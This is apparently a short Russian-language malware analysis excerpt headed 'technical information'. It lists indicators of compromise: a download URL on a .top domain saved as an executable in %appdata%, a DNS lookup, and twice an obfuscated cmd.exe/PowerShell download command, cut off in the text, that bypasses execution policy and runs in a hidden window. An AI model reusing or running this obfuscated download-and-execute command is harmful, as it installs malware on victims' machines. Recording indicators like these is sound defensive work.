Техническая информация
- http://addresse.top/cert.hls как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^w^E^R^s^H^e^Ll.exE -EX^e^CU^TI^ONp^oLIc^y^ B^YPa^sS^ -no^pRoF^i^Le -WiNDO^WstylE hI^D^D^en^ (nEW-^OB^JecT ^sYSt^eM.neT.^WEBCliE^Nt).^do^w^nLoA^D^FILe(^'http://address...
- DNS ASK ad###sse.top
- '<SYSTEM32>\cmd.exe' /c "P^o^w^E^R^s^H^e^Ll.exE -EX^e^CU^TI^ONp^oLIc^y^ B^YPa^sS^ -no^pRoF^i^Le -WiNDO^WstylE hI^D^D^en^ (nEW-^OB^JecT ^sYSt^eM.neT.^WEBCliE^Nt).^do^w^nLoA^D^FILe(^'http://address...' (со скрытым окном)